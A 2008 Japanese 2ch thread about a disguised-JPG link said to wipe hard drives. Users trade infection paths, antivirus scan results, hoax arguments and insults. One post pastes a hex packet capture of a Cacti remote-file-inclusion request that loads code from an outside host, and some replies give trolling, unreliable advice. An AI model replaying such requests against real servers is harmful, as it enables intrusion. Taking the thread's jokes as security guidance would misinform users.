610名無しさん@お腹いっぱい。:2008/01/06(日) 09:41:57
>>608
janeってstyleあたり?susieプラグイン通した?

ってか、前から気になってたんだけど、これのビューアであやしいURLを
踏んだけど平気だったってひとよくいるけど、これって、susieプラグイン
通してる人と通してない人っているよね…。
どっちも大丈夫っていうなら大丈夫だけど、
たとえば、プラグインつかっている人が大丈夫だけど、通してない人はアウトっていう
やつが出てきたら、かえって意図せずデマが流れて悲惨になる気が…

>>609
SP3の場合、セキュリティもさることながら、安定性や、既存ソフトの動作不具合も気になるww
がんばれ
611名無しさん@お腹いっぱい。:2008/01/06(日) 10:06:20
これ訴えられたら、うpロダ管理人も2ちゃんも民事告発対象になる。

612609:2008/01/06(日) 10:24:29
とりあえずHDに保存してたSP3で環境作ってみた。
NOD32/JaneDoe View Alpha/Firefoxは正常動作。
検出・動作はSP1と全く変わらず。安定性はSP2とあんまり変わらないと思う。
…IE大丈夫か?
613608:2008/01/06(日) 10:31:59
>>610
jane style
プラグインは別になにもw
ほとんどデフォの状態
614名無しさん@お腹いっぱい。:2008/01/06(日) 10:41:43
susieプラグインて何?
615名無しさん@お腹いっぱい。:2008/01/06(日) 11:02:30
>>611
は?
616名無しさん@お腹いっぱい。:2008/01/06(日) 11:06:02
>>612-613
なるほど。

>>614
俺もプログラムとかさっぱりなんだが、susieってのは、フリーのビューアで昔、定番だったやつ。
んで、このソフト、画像出力にプラグイン方式を使っているから、
プラグインを入れることにより、出力できるファイル形式やら出力方法を自由に変えられるの。

んで、このソフト自体をメインに使っている人は最近はいないと思うんだけど、
このプラグインは他のソフトにも相当利用されていて(有名なのだと、Leeyesとか)、
これにより、画像の表示方法が、自由にカスタマイズできるわけ。

んで、janestyleでも、ビューア設定のところでこれを使えるのさ。

これを使うと、jpg偽装でも、プラグイン独自の読み込みをするから案外ブラクラは回避できたりするわけ
もちろん、自分が何か踏んだが、ゼロデイでまだ対策がわからないというときに、
自分と同じプラグインつかっているひとを見つけないと情報交換できないから困ることもあるが。
(そもそもsusieプラグインでもアウトなら、janeデフォで使っている人はほとんどアウトな気もしないでもないけど)
617名無しさん@お腹いっぱい。:2008/01/06(日) 14:02:50
民事告発ってどこの外国の制度?w
618名無しさん@お腹いっぱい。:2008/01/06(日) 14:35:52
俺の人生もフォーマットしてほしい
619名無しさん@お腹いっぱい。:2008/01/06(日) 14:36:42
雨だろ

雨でやられたら行かなくてはいけないからな
620名無しさん@お腹いっぱい。:2008/01/06(日) 14:47:27
これで検出駆除

ttp://winantivirus.com/
621名無しさん@お腹いっぱい。:2008/01/06(日) 15:43:15
すいません、怪しいと思われる画像を踏んでしまったんですが、
このままではシャットダウンも出来ません・・・
何処かチェックできる所はありませんか?
方法でも良いのでお願いします・・・
622名無しさん@お腹いっぱい。:2008/01/06(日) 15:51:34
>>621
とりあえずこのスレを最初から読むべきじゃないのか?
623名無しさん@お腹いっぱい。:2008/01/06(日) 16:12:55
>>622
黙れカス
624名無しさん@お腹いっぱい。:2008/01/06(日) 16:54:20
               ./  ヽ      /  ヽ
               /   ヽ___/   ヽ
            /       l___l   \
            |      ●  |    |  ●  |  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       へ    |   へ     ヽ  ./     | <  逮捕者マダー?
        \\  \  \\    ヽ/     /   \____________
チン        \\  .> \\          ヽ
   チン      \\/    \\  _       |
      \ ̄ ̄ ̄ ̄ ̄ ̄ ̄/  / ̄   ヽ    /   _
        \回回回回回/ ̄ ̄ヽ        / ̄ ̄ /|
         \___/      ヽ____/  /  |
                               /   |
                              /     |
625名無しさん@お腹いっぱい。:2008/01/06(日) 17:09:24
>>621
>>383みたいな書き方だな。この人はあれから全く顔出してないし。釣りの一種か。
626名無しさん@お腹いっぱい。:2008/01/06(日) 17:12:02
>>625
黙れクソカス
627名無しさん@お腹いっぱい。:2008/01/06(日) 17:37:15
>>623
存在するなカス
628名無しさん@お腹いっぱい。:2008/01/06(日) 17:59:46
ちょっと聞きたいんですがhttp://goggle.comに入るとどうなる?
629名無しさん@お腹いっぱい。:2008/01/06(日) 18:05:35
>>628 マカフィーの宣伝だとこうなるらしい。
ttp://jp.youtube.com/watch?v=R8Ep0seKlN8&eurl=
630名無しさん@お腹いっぱい。:2008/01/06(日) 18:25:38
>>629何度見ても泣けてくる
631名無しさん@お腹いっぱい。:2008/01/06(日) 18:27:59
>>629
サンクス。グーグルと間違えないようするよ。
632名無しさん@お腹いっぱい。:2008/01/06(日) 18:35:13
俺、以前にjavascript切っててもブラクラ発動するサイト踏んだんだ。マジで。
で、Proxomitronを入れたら回避出来た。
それ以来、Proxomitronを間にかましてしかブラウジングしなくなったよ。
オミトロン様様です。
633名無しさん@お腹いっぱい。:2008/01/06(日) 18:58:26

そろそろ夏冬の自由課題に「ウィルスの収集と観察」を提出するお子ちゃまも現れるのでは・・・
634名無しさん@お腹いっぱい。:2008/01/06(日) 19:17:04
goggleはもう無害なんだけどね。
未だに騒いでるお馬鹿ちゃんがいるみたいだけど
635名無しさん@お腹いっぱい。:2008/01/06(日) 19:34:55
もう無害 その安心が 命取り
636名無しさん@お腹いっぱい。:2008/01/06(日) 19:41:46
>>627
黙れカス
637名無しさん@お腹いっぱい。:2008/01/06(日) 19:55:33
>>636
存在するなカス
638名無しさん@お腹いっぱい。:2008/01/06(日) 19:55:56
>>633
Zipでクレ
639名無しさん@お腹いっぱい。:2008/01/06(日) 20:16:53
>>637
黙れカス
640名無しさん@お腹いっぱい。:2008/01/06(日) 20:47:11
641名無しさん@お腹いっぱい。:2008/01/06(日) 20:51:05
The requested URL /wmf_exp.html was not found on this server.
642名無しさん@お腹いっぱい。:2008/01/06(日) 20:56:40
kikuzouさん?
643名無しさん@お腹いっぱい。:2008/01/06(日) 22:29:53
なんか前にも似たような釣りネタあったな
644名無しさん@お腹いっぱい。:2008/01/06(日) 23:30:46
open jane も感染する?
645名無しさん@お腹いっぱい。:2008/01/06(日) 23:40:40
人ごみに行かないので風邪をひきません
646名無しさん@お腹いっぱい。:2008/01/07(月) 00:52:35
OppaPpi-も感染する?
647名無しさん@お腹いっぱい。:2008/01/07(月) 21:57:05
ノロウイルスの方がマジで怖い
648名無しさん@お腹いっぱい。:2008/01/07(月) 22:17:04
649名無しさん@お腹いっぱい。:2008/01/07(月) 22:29:47
gigigiの画像の部分をクリックしてしまいました。
IE7なので、再起動してもフォーマットはされませんでした。
今しがたノートンでスキャンしたらDownloaderが検出されました。
これがフォーマットウィルスですか?
駆除前に送信したメールで、受信者に感染しますか?
ご存知の方教えて下さい、お願いします。 
650名無しさん@お腹いっぱい。:2008/01/07(月) 22:48:27
する可能性は大

相手に損害が出たら訴えられます
651名無しさん@お腹いっぱい。:2008/01/07(月) 22:50:10
>>650
いい加減にしろ。何度言ったら分かるんだ。
652649:2008/01/07(月) 22:55:03
>>651
感染しないと言う事ですね。
ありがとうございます。
653名無しさん@お腹いっぱい。:2008/01/07(月) 23:41:21
とにかくスタートアップになければ感染してないってことでいいの?
654名無しさん@お腹いっぱい。:2008/01/08(火) 00:03:16
>>653
犯人特定の定義ファイルを作ればいい
655名無しさん@お腹いっぱい。:2008/01/08(火) 02:21:47
open janeも感染する?
656名無しさん@お腹いっぱい。:2008/01/08(火) 03:40:31
>>654
スタートアップになくても感染してる事例があるってこと?
657名無しさん@お腹いっぱい。:2008/01/08(火) 04:02:37
570 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 07:34:28 ID:UpN/oKQ90
>>562
感染確認
心配な人、↓にbatファイルが無ければおk

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
658名無しさん@お腹いっぱい。:2008/01/08(火) 04:08:33
659__Mew__ ◆2SMew/3po. :2008/01/08(火) 04:37:52
少し手を加えるだけで各社ともパターンは素通りしますね。ごくろうさん。
660名無しさん@お腹いっぱい。:2008/01/08(火) 06:17:21
基本的なことだけれど
必要な時以外JAVAとか切っとく癖を付けるのが大事ですな
661名無しさん@お腹いっぱい。:2008/01/08(火) 11:57:34
http://so.7walker.net/guide.php
より抜粋

1.偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
2.動画再生ボタンをクリックするとスクリプトが発動。
3.telnetストームをはじめとする複合的なブラクラで各種アプリケーションソフト(メディアプレイヤー、メールソフト、スカイプなど)を起動させる。
4.ユーザーがパニくってるところでbatファイル?を間違って実行させる。
5.再起動させると、HDDあぼーん。
662名無しさん@お腹いっぱい。:2008/01/08(火) 17:19:40
別物?

MySpaceやExcite.comなどの大手サイトに、マルウェアをインストールさせるバナー広告が表示されていたという。
2008年01月08日 13時05分 更新
 米MySpaceなどの大手サイトに、マルウェアをインストールさせるバナー広告が混入していたと、セキュリティ企業のTrend Microがブログで報告した。
 Trend Microが報道を引用して伝えたところでは、悪質バナー広告はMySpaceのほか、検索ポータルサイトのExcite.comや、ドイツのBlickというサイトでも見つかったという。
 MySpaceは人気便乗を狙ったマルウェアの標的になっており、11月にも、ユーザーを悪質サイトにリダイレクトするコードが仕掛けられる事件が起きている
 こうしたケースではシステムの脆弱性が悪用されることも多く、ユーザーはOSだけでなく、サードパーティーのソフトも常にセキュリティアップデートをインストールしておく必要があると、Trend Microは忠告している。
663名無しさん@お腹いっぱい。:2008/01/08(火) 19:06:11
9999999なら知ってる
664名無しさん@お腹いっぱい。:2008/01/08(火) 20:01:07
正月帰ったら実家の家族用パソコンがやられとった。
どうやら弟が踏んだらしい。

2年前に死んだ犬の写真と、
母親の友人たちとの旅行の写真が消えてしまったと
両親がたいそう落ち込んでた・・・
弟も弟で親と大喧嘩して、家は年始早々
あまりいい雰囲気じゃなかった・























とか書けば満足ですか犯人さんww
665名無しさん@お腹いっぱい。:2008/01/08(火) 20:30:10
^^
666名無しさん@お腹いっぱい。:2008/01/08(火) 21:59:06
>648
> ttp://internet.watch.impress.co.jp/cda/news/2008/01/07/18052.html
> シマンテックとトレンドマイクロに確認したところ、両社ともこの問題について対応を進めており〜


結局はその場限りの――つまり極めてユニークなファイルにしか対応しないという
両社および MS の頭の良さは、過去の例からしてもわかりますね。
つまりこれ、もう少なくとも4年以上も根本的な対応を放置しているということです。


ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

> yahooでの話ですが、amilala-exploitは、複数のモジュールの組み合わせによって
> 実行内容も毎回変るようです。各スクリプトの記述もどんどん更新され
> (PHPやASPで動的ランダム乱数付き出力のものもあったと思う)、
> ウィルスベンダーやフィルタリングが過去のものに対応しても、
> 最新のものには指紋とパターンマッチしないということになります。

ttp://oshiete1.goo.ne.jp/qa770340.html
ttp://www.geocities.co.jp/Playtown-Bishop/7102/taisaku/flatalk4.html#562
04/02/09

> トレンドマイクロが、アミララについて回答した
> winupdateはまめに。VBでは対応しかねます。
667名無しさん@お腹いっぱい。:2008/01/08(火) 22:23:26
マルウェアをインストールさせる手法は、
過去に修正されたと思われている脆弱性を組み合わせて利用しているのが多いですね。
まあそれ以前に、パッチを当てていない人もいまだにいるということもありますが。

そして修正済だとされる脆弱性が本当に修正されているのかどうか、
つまりある条件のもとでは Unpatched になるのではないかと、
検証してみる気はないんでしょうかね。愉快なものがけっこう残っているものですよ。
668名無しさん@お腹いっぱい。:2008/01/08(火) 22:53:52
0000 00 0c 29 f3 5b 69 00 0d 48 1f 0c 56 08 00 45 00 ..).[i..H..V..E.
0010 01 4e ea e8 40 00 30 06 33 14 41 cb 86 64 cb 57 [email protected]
0020 98 26 d2 5f 00 50 38 a2 44 ed 9b d4 88 b2 80 18 .&._.P8.D.......
0030 16 d0 a3 79 00 00 01 01 08 0a df 5b ae a3 00 00 ...y.......[....
0040 00 00 47 45 54 20 2f 63 61 63 74 69 2f 69 6e 63 ..GET /cacti/inc
0050 6c 75 64 65 2f 63 6f 6e 66 69 67 5f 73 65 74 74 lude/config_sett
0060 69 6e 67 73 2e 70 68 70 3f 63 6f 6e 66 69 67 5b ings.php?config[
0070 69 6e 63 6c 75 64 65 5f 70 61 74 68 5d 3d 68 74 include_path]=ht
0080 74 70 3a 2f 2f 77 77 77 2e 67 65 6f 63 69 74 69 tp://www.geociti
0090 65 73 2e 63 6f 6d 2f 74 72 75 73 74 6f 70 74 2f es.com/trustopt/
00a0 74 2e 74 78 74 3f 20 48 54 54 50 2f 31 2e 31 0d t.txt? HTTP/1.1.
00b0 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 63 .Accept: */*..Ac
00c0 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 cept-Language: e
00d0 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45 6e 63 n-us..Accept-Enc
00e0 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def
00f0 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..User-Agent
0100 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozilla/4.0 (c
0110 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; MSIE
0120 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 39 38 29 6.0; Windows 98)
0130 0d 0a 48 6f 73 74 3a 20 32 30 33 2e 38 37 2e 31 ..Host: 203.87.1
0140 35 32 2e 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 52.38..Connectio
0150 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a n: Close
669名無しさん@お腹いっぱい。:2008/01/08(火) 23:01:20
>>668
これ何?
670名無しさん@お腹いっぱい。:2008/01/08(火) 23:17:05
バイナリのコピペだろ
671名無しさん@お腹いっぱい。:2008/01/08(火) 23:27:57
672名無しさん@お腹いっぱい。:2008/01/09(水) 00:31:04
そうナリ
673名無しさん@お腹いっぱい。:2008/01/09(水) 02:21:30
これで消えた人ってほんとにいるの
674名無しさん@お腹いっぱい。:2008/01/09(水) 02:48:11
全部ネタだよ。まとめとかも含めてただの釣り。
複数の回線とPCで、あらかじめ作っておいたシナリオのレスで自演してるだけ。
昔で言うクラッシュミーみたいなのとか、ストレンジワールドみたいなものなら問題だが、
こんなただ転送されるだけでブラクラでもなんでもない代物で祭りになるわけないだろが。
675名無しさん@お腹いっぱい。:2008/01/09(水) 05:55:15
>>674
実際に消えたわけだが。
VirtualBox上でだがな。
676名無しさん@お腹いっぱい。:2008/01/09(水) 10:37:29
正月休みが明けて数日経ったわけだが
フォーマットされて仕事ができなくなったという話を聞かないな
やっぱりネタだったの?
677名無しさん@お腹いっぱい。:2008/01/09(水) 11:02:44
踏むとどうなるか明記されていた上に対処法だっていち早く公開されてWikiまでできてたからな。
公開された対処法も講じずに敢えて踏む馬鹿もそんなにいないだろ。
678名無しさん@お腹いっぱい。:2008/01/09(水) 12:05:04
>>676
windows update すれば?今日公開されてるよ。
679名無しさん@お腹いっぱい。:2008/01/09(水) 14:28:34
フォーマットされたら
2chの専用スレを探して書き込みしているどころじゃない気がするが・・・

初心者ならパソコンが壊れたと勘違いするだろうしね。
680名無しさん@お腹いっぱい。:2008/01/09(水) 18:37:38
>>572を踏んじまったのだが
再起動してもHDDは消えていない

Trojan.HTML.Agent.bというのはどこにあるのだろう
駆除しようにも場所がわかりません

カスペルのオンラインスキャンでも何も出んし・・・
681名無しさん@お腹いっぱい。:2008/01/09(水) 21:46:22
残ってるのはこのスレだけか
682名無しさん@お腹いっぱい。:2008/01/09(水) 22:12:26
今更ニコニコ動画の感染動画見たが検出したらブラクラ発動しても問題ないんだな(動画はブラクラ発動する前にAVGで検出してた)
683名無しさん@お腹いっぱい。:2008/01/10(木) 01:39:07
もうネタだって気付けw jpg偽装なんてもう前世紀からあるんだしw
アドレスはころころ変わるかもしれんが、実質何年も前から存在してるしw

ホントにウィルスや脆弱性だったら、セキュリティソフト会社もマイクロソフトも
いくらなんでも4年以上放置せんてw

スレ乱立→ネタ化→年末年始向け祭り (超わかりやすい)

こんなブラクラにすらなってないただのグロ系が、急に注目されるわけがないw
684名無しさん@お腹いっぱい。:2008/01/10(木) 01:48:39
なぜネタにしたがる?
685名無しさん@お腹いっぱい。:2008/01/10(木) 02:21:14
ネタだというわかりやすい証拠を・・

・2ちゃんでのみ話題 (←あとはこれを見たブロガや記者がネタにしているくらい)
・古典的ブラクラ(鑑定スレテンプレに既出)が、なぜか急に出現したことになってる
・何より確かなのは、踏んでも無事だというこの事実(グロではあるかもしれませんが)
 (これが本当なら、被害者続出でかなりまえから世界中で話題になっているはずですよね)
686名無しさん@お腹いっぱい。:2008/01/10(木) 02:42:40
>>685
>>648のリンク先見てみろ
687名無しさん@お腹いっぱい。:2008/01/10(木) 02:49:12
>>684
名前だけで実は全く対策できないソフトウェアを売ってる会社の人じゃね?
バレたら困るんでしょ、いろいろと
688名無しさん@お腹いっぱい。:2008/01/10(木) 02:59:01
貼りまくってたバカがネタ化しようとして必死なんだろw
689名無しさん@お腹いっぱい。:2008/01/10(木) 03:56:33
ネタだというもっと具体的な証拠をひとつ

ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1198642072/l50
↑の 269 に例の偽装ファイルと(たぶん)同じものが貼られてあるようですよ。
踏んでも特に変わったことは起きないようです。つまり無害(笑)

★けれど、もちろん各自踏むのは自己責任で(笑)
690名無しさん@お腹いっぱい。:2008/01/10(木) 05:58:15
>>689
これは亜種だと思うが。
で、JavaScriptの飛び先が何らかの理由で404になってるみたい。
飛び先の内容によっては有害”だった”かもしれないよ。
どこに飛ぶのかはちょっとソースが暗号化されてるっぽいから今はわからん。
691名無しさん@お腹いっぱい。:2008/01/10(木) 07:51:32
>>661より
>1.偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
>2.動画再生ボタンをクリックするとスクリプトが発動。 (以下ry

↑なんにしても、リダイレクトされた時点で、その偽装JPGは無関係。
その後に起こることは、全てリダイレクトされた別ページ上。
転送するのに何も偽装JPGである必然性もない。HTML上で転送されるかもしれない。

スレタイみたいに「踏むとフォーマットされるヤバイ画像」ってのは間違った認識。
せいぜい「(環境によっては)踏むと有害かもしれないページに
リダイレクトされる画像(に見えるが実はHTML+JavaScript)」ってとこ。
692名無しさん@お腹いっぱい。:2008/01/10(木) 07:56:52
でもそんなタイトルじゃインパクトに欠ける/踏むとフォーマットの方が恐怖感がある
    ↓
祭り騒ぎにしたい=要するにネタ
693名無しさん@お腹いっぱい。:2008/01/10(木) 08:18:53
今頃何言ってるの?って感じだけどな…
そこらの説明や認識は、このスレ初期でとっくに済んでるじゃん
対応済みだと主張していた某信者のおかげでさ
694名無しさん@お腹いっぱい。:2008/01/10(木) 10:10:29
NO・・・あれ、誰か来たみたい。ともあれ>>691は正しい認識ではある。
ただ初心者に対しては、そう書いた方が気をつけるしわかりやすいでしょ。
別に祭りにすらなってない。注意喚起してただけで、各社対応が終わった段階で
スレが消えるのは当然。だがなぜそれが>>692という結論なのか、論理的に破綻している。
ただネタだという結論からして、それに枝葉を付けているだけじゃないか。
695名無しさん@お腹いっぱい。:2008/01/10(木) 22:28:18
(。∇゜)б
696名無しさん@お腹いっぱい。:2008/01/10(木) 22:39:32
踏んだら至る所に南京、法輪って書き込むほうが面白いのに
中華で踏んだら即逮捕で相当笑えそう
697名無しさん@お腹いっぱい。:2008/01/11(金) 00:49:22
既にbatを落とさせるサイトそのものがなくなってるのに亜種もなにもないだろw
馬鹿じゃないのか
698名無しさん@お腹いっぱい。:2008/01/11(金) 01:29:58
ハァ?なくなってないが。
699名無しさん@お腹いっぱい。:2008/01/11(金) 01:42:42
     /\⌒ヽペタン
   /  /⌒)ノ ペタン
  ∧_∧ \ (( ∧_∧
 (; ´Д`))' ))(・∀・ ;)  もちつけ
 /  ⌒ノ ( ⌒ヽ⊂⌒ヽ
.(O   ノ ) ̄ ̄ ̄()__   )
 )_)_) (;;;;;;;;;;;;;;;;;;;)(_(
700名無しさん@お腹いっぱい。:2008/01/13(日) 16:58:34
このスレ終わっちゃったの?
701名無しさん@お腹いっぱい。:2008/01/13(日) 20:25:51
   ___.                     ∩゛     ∧空∧    ((( ))) /\
  /. ――┤. -=・=-    -=・=-    | |  ∧ ∧{´ ◎ `}____( ´∀`)\ う \
 ./(.  = ,= |      ∧∧    ∧_∧  | | ( ´ー`) ):::/´∀` ;:::: \ヽ(`Д´)ノ゛\ ま\
 |||\┏┓/∫    (=゚ω゚)ノ~ ( ´Д`)//  \ < .∧|∧   /::::::::::| .¶_¶.    \い\
 V/ ∧,,∧ ∬  〜(  x)  /       /   ,一-、(´ー`)  /:::::|::::::| (ΦдΦ)/~   \棒\
  || ミ,,゚Д゚ノ,っ━~~ U U   / /|    /   / ̄ l⊂ヽ \/|:::::::::|::::::|  γ__  ∧w∧ 旦∬
 人 ミ ,,,  ~,,,ノ  .n  THANK YOU 2ch ■■-っ ┌───────┐  \ ( ゚Д゚ )∩゛
( ゚ー゚)と..ミ,,,/~),ヽ(凸)ノ~     and..     ´∀`/. | ●        ● |     ヽ    ノ
  / ̄ ̄し'J\[Y] GOOD-BYE 2ch WORLD! /| .┌▽▽▽▽┐. |____|__||_| ))
 /     ●  ●、ヽ                  (. ┤ .|        |. |□━□ ) (゚Д゚)?
 |Y  Y       \  またどこかで会おうね.. \.  └△△△△┘. |  J  |)∧_∧
 |.|   |       .▼ |∀゚)               |\あ\       | ∀ ノ " ,  、 ミ
 | \ /■\  _人 |∧∧∩゛∧_∧∩゛∧_∧  |   \り.\     | - Å′ ゝ∀ く
 |  ( ´∀`)___/( ゚Д゚.)'/ ( ´∀` )/ (・∀・ ),. |.    \が\.    |  ). \  Λ_Λ
 \ ( O   )  冫、 U  /  (     / ⊂  ⊂.)ヽ(´ー`)ノ゛ \と.. ∧_∧/(´Д`;)<丶`∀´>
  |││ │   `   |   |   ∪ |  |  ( ( (  (  へ (゚д゚)〜⌒(゚ー゚*) (-_-) (・ω・` )
  (_(__(__)(・∀・) ∪~∪  (_(__) (_(_) く ⊂⌒~⊃。Д。)⊃⊃⊃(∩∩)(∩ ∩)

このスレはここまでです。ご愛顧ありがとうございました

702名無しさん@お腹いっぱい。:2008/01/13(日) 21:16:01
A-Squared 3.0.0.126 1230.htm Trojan-Downloader.JS.Agent.aqr
Arcavir 1.0.5 1230.htm Trojan.Downloader.Js.Agent.Aqr
avast! 3.0.1 1230.htm Clean
AVG Anti Virus 7.5.50 1230.htm Small.2.BJ
Avira AntiVir 2.1.11-47 1230.htm TR/Dldr.Agent.aqr.20
BitDefender 7.60825 1230.htm Clean
CA eTrust N/A 1230.htm Clean
CAT QuickHeal 9.00 1230.htm Clean
ClamAV 0.91.2 1230.htm Clean
CPSecure 1.14 1230.htm Troj.Downloader.JS.Agent.aqr
Dr. Web 4.44.0.10150 1230.htm Clean
F-PROT 4.6.8 1230.htm JS/Agent.CW
F-PROT 6 6.2.1 1230.htm JS/Agent.CW
F-Secure 1.10 1230.htm JS/Agent.CW [Libra]
Kaspersky 5.7.13 1230.htm Trojan-Downloader.JS.Agent.aqr
McAfee Virusscan 5.20.0 1230.htm Clean
NOD32 2.70.6 1230.htm Clean
Norman Virus Control 5.70.01 1230.htm JS/Agent.C
Panda 9.04.03.0001 1230.htm Trj/Agent.HQI
Sophos Sweep 4.25.0 1230.htm Clean
Trend Micro N/A 1230.htm JS_DLOADER.ZX
VBA32 3.12.2.5 1230.htm Clean
VirusBuster 2005 1.3.4 1230.htm Clean

http://scanner.virus.org/vscan
703名無しさん@お腹いっぱい。:2008/01/13(日) 21:22:12
704名無しさん@お腹いっぱい。:2008/01/13(日) 23:00:29
>>703
開けないんだが
705名無しさん@お腹いっぱい。:2008/01/14(月) 02:18:26
残ってるのはここだけか
706名無しさん@お腹いっぱい。:2008/01/14(月) 11:44:28
>>703
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (2)
注意!ループタグを発見! (7)
注意!逃げウィンドウを発見! (4)
危険!mailtoストームを発見! (100)
危険!無限ループを発見! (4)
危険!ニュースストームを発見! (12)
危険!Telnetストームを発見! (198)
ブラクラチェックが終了しました。
707名無しさん@お腹いっぱい。:2008/01/14(月) 23:44:56
まだやってんの
708名無しさん@お腹いっぱい。:2008/01/15(火) 18:09:05
      ?????????
    ??? ????  ???     ???
  ?????????????■     ? ??
 ?? ??■???■??????   ????
  ?????     ???  ??     ?
 ???? ?   ■  ??????   ?? バカにはコピペできないポンデライオン
?? ???????    ????■?????
??????     ???????  ▼
??????????????   ??   ?
   ?? ????  ?????■? ???
   ??????????■????▼ ?
     ??  ???■??  ?   ?  ?
         ????  ?  ?  ????
709名無しさん@お腹いっぱい。:2008/01/15(火) 20:22:33
jpg偽造てwwwこんなのブラグラじゃねーよwwww
ジャバとか知らなさ杉ww
しょぼ杉!こんなんでスレたてんなよバカwww
クラシュミーとかストレンジとかもっとスゲー凶悪なのあるぜ
出なおして来いwww
710 ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2008/01/15(火) 21:17:14
       彡川川川三三三ミ〜
      川|川 / 臭 \|〜
      川川  ◎---◎|〜 
      川川     3  ヽ〜
      川川  ∴) A(∴)〜  
      川川     U  /〜     ___
    _;川川     ダッラ〜   .    |  |   |\_
  /  川川   __/        . |  |   | |  |\
 /    /     | |              |  |   | |  |::::|
(    (   ◎  / \_          .|  |   | |  |::::|
 \   \   /\    ̄ ̄\     |  |   | |  |::::|
  /:\   \  ドピュ ̄\っ))))〜〜|  |   | |  |::::|
 /:::  \    つ___  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 |:::    \   (__3。 ;。 ̄ ̄ |  _________ .|
 |::::     \__/          .| |             . |.|
 \:::    (;;; );; )          | |           .   |.|
   \      \\       .| |           |.|
    \      ) )      . | |           |.|
     /     / /        | |           |.|
    /     / /         |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
711名無しさん@お腹いっぱい。:2008/01/16(水) 17:01:24
JavaScriptだとか、画像だとか、なぜそのようなつまらないことにばかりに目を向けるのでしょう(笑)
ホントに愉快な人たちですね。wikiとかもウソばかり書いてあるし。
それからあと、Y売の記事書いた某は、救いようのないおバカさんのようですね(笑)
気付いていないのはあんたのほうなんですよ(笑)
712名無しさん@お腹いっぱい。:2008/01/16(水) 19:23:46
あらら脳ミソまで感染されちゃったのか
713名無しさん@お腹いっぱい。:2008/01/16(水) 23:10:32
(笑)
714名無しさん@お腹いっぱい。:2008/01/17(木) 04:21:08
屹度某所で被爆したか、或いは其れを見てゐたお莫迦さんが弘めようと試みたのでせう。
いづれも某所のサービスを利用しない者には無關係の筈ですからね(笑)
數日前にフォーラムでも集計結果のレポートがありましたね。
其れを見てわかるのは、數年前の Microsoft Data Access Components の時からさうでしたが、
表面的な事象許りに氣を取られすぎてゐると云ふことです(笑)
715名無しさん@お腹いっぱい。:2008/01/17(木) 18:21:09
716名無しさん@お腹いっぱい。:2008/01/17(木) 22:25:17
つまりエロ画像うpしほーだい、管理してない奴が悪いてかwww
717名無しさん@お腹いっぱい。:2008/01/17(木) 22:29:02
エロ画像・動画へのリンク満載の2ちゃんねるはどうなのよw
718名無しさん@お腹いっぱい。:2008/01/17(木) 22:39:01
執行猶予ワリカン
719名無しさん@お腹いっぱい。:2008/01/18(金) 09:37:40
まあこれでだね、判例が出ましたよと
うpした奴のほうが〜と反論しても、そんなのカンケーネーと一切無視されると
悪いのは管理人だと

あれじゃないですか。昔のエロ本ビニ本時代の摘発にしても、
見せしめでパクられるのは弱小出版と相場がきまっとりました

今回の件でいえば、たとえば同じ画像がアホーのジオの鯖に放置されていたとしても、
アホーのほうは見て見ぬふり。お上のケツの穴の大きさが測り知れますなぁ
720名無しさん@お腹いっぱい。:2008/01/19(土) 23:20:18
そりゃ勝てるかどうか分からない相手に喧嘩を仕掛けるのはただの馬鹿だろw
721名無しさん@お腹いっぱい。:2008/01/20(日) 09:24:25
マイクロソフトだけ対象にしなかったコントローラの接続方法特許訴訟厨と同じだな
722名無しさん@お腹いっぱい。:2008/01/24(木) 04:46:18
ぬふう =3
723名無しさん@お腹いっぱい。:2008/01/24(木) 13:31:21
 
コンピューターウイルス:作成者、配信者、計3人国内で逮捕 京都府警
ttp://mainichi.jp/select/today/news/20080124k0000e040051000c.html
724名無しさん@お腹いっぱい。:2008/01/24(木) 20:58:32
ttp://www13.atwiki.jp/burakura_hdd/pages/12.html
まとめwikiを見たんだけど
未対応のアンチウィルスソフトってまだあるんだね
725名無しさん@お腹いっぱい。:2008/01/25(金) 10:21:51
>>723
著作権法で無理やりってのが苦しいね。
作成の証拠だけでどうにかできりゃいいのに。
726名無しさん@お腹いっぱい。:2008/01/25(金) 12:48:54
>>1もタイホされるの?
727名無しさん@お腹いっぱい。:2008/01/25(金) 16:27:44
トレンドはこれには対応しないって、宣言したのにねぇwww
他社が対応したからって、いまさら急に
728名無しさん@お腹いっぱい。:2008/01/25(金) 16:49:47
>>727
マカフィーが泣くのでやめてください
